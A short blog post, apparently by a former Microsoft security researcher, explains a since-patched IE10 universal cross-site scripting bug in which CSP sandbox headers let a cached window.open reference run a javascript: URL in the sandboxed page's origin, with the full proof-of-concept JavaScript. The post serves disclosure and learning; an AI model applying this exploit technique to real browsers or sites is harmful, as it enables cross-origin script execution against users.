IE10 UXSS: Sandbox Headers Paradox

I called this the “SandboxHeadersParadox” because the UXSS actually required the target URL to be sandboxed via X-Content-Security-Policy headers — meaning the very security headers intended to protect a page made it exploitable via this technique. The trick relied on caching a window.open reference before the target page loaded, then using it afterward.

var win, win_open;

function main() {
    win = window.open("index.html"); // Open any same-domain URL.
    win_open = win.open; // Save a reference of the window.open method.

    setTimeout('win.location = "sandboxed-via-headers.aspx";', 1000);
    setTimeout('win_open("javascript:alert(document.URL)","_self")', 2000);
}

The page is running in IE8 emulation mode (via X-UA-Compatible) in order to preserve the cached window.open reference across navigation — a behavior that was tightened in later document modes. Once the window navigates to the CSP-sandboxed page, calling the cached win_open with a javascript: URL executes in the sandboxed page’s origin. Tested on IE10 Desktop Win8 Fully Patched.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [VBScript Cross-Origin Variable Existence Detection and Error Injection] :: [IE10 Resident Script via Cached iFrame window.open] >